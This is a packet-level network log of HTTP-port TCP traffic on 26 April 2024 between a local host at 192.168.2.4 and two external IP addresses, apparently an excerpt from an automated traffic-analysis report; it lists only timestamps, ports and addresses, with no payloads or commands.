Apr 26, 2024 23:09:01.758764982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.758799076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.758831024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759000063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759012938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759023905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759056091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759068012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759079933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759100914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759107113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759131908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759157896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759274006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759290934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759301901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759339094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759361982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759485960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759535074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759577990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.759592056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759675980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759690046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.759733915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760323048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760366917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760375023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760389090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760404110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760416031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760426998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760435104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760483027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760494947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760508060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760539055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760546923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760577917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760584116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760638952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760652065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760698080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760730982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760742903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760766029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760785103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760802031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760821104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760852098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760864019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760890007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760891914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760938883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760951996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.760973930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.760983944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761006117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761007071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761044025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761167049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761179924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761213064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761230946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761245012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761267900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761297941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761305094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761333942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761334896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761348009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761360884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761385918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761394024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761437893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761445045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761467934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761507988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761518955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761544943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761569977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761595011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761600018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761642933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761662960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761679888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761693954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761725903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761725903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761749983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761770010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761804104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761843920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761850119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761856079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761876106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761897087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761898994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761955976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761962891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.761969090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761982918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.761995077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762005091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762020111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762041092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762070894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762088060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762110949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762111902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762146950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762155056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762161016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762197971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762209892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762233019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762244940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762286901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762320995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762334108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762345076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762372971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762401104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762414932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762428045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762439013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762449980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762458086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762464046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762499094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762593031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762676001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762691021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762702942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762720108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762748957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.762773037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.762813091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763371944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763384104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763433933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763443947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763546944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763562918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763592958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763605118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763641119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763653994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763680935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763708115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763714075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763729095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763745070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763771057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763772011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763786077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763797998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763817072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763830900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763854980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763869047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763889074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763917923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.763941050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763973951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.763994932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764017105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764033079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764038086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764066935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764127016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764132977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764138937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764152050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764164925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764182091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764198065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764199018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764234066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764245987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764271975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764307022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764319897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764339924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764364958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764378071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764400005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764400005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764437914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764444113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764498949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764527082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764539003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764564037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764581919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764594078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764602900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764628887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764626980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764642954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764681101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764796019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764808893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764827967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764839888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764846087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764853954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764868021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764888048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764904022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764918089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764923096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.764959097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764971018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.764981985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765018940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765038967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765052080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765072107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765079021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765093088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765113115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765121937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765141010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765161037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765182018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765203953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765229940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765255928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765292883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765300035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765305996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765341997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765360117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765360117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765377045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765398979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765405893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765453100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765458107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765470982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765547991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765568972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765592098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765604973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765641928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765670061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765686989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765708923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765721083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765747070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765754938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765800953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765800953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765814066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765893936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765908003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765947104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.765948057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.765981913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.837558031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837574005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837634087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837652922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837666035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837690115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837699890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837718010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837728024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837737083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837747097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837785006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837836981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837851048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837862015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837873936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837881088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837902069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837908983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837924004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837932110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837941885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837955952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.837975979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837990999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.837996006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.838006973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.838015079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.838036060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.838043928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.838071108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.838082075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.838094950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.838121891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.933962107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.933979988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.934017897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.981091976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.022816896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.022846937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.022912025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.022938013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.022964954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024175882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024236917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.024270058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024339914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.024362087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024432898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024521112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024565935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.024573088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024614096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.024673939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.024816990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025003910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025047064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.025079012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025120020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.025151014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025250912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025346994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025398970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.025485992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025527000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.025557995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025609970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025691032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025732040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.025758982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025805950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.025805950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.025912046 CEST	80	49734	176.97.76.106	192.168.2.4
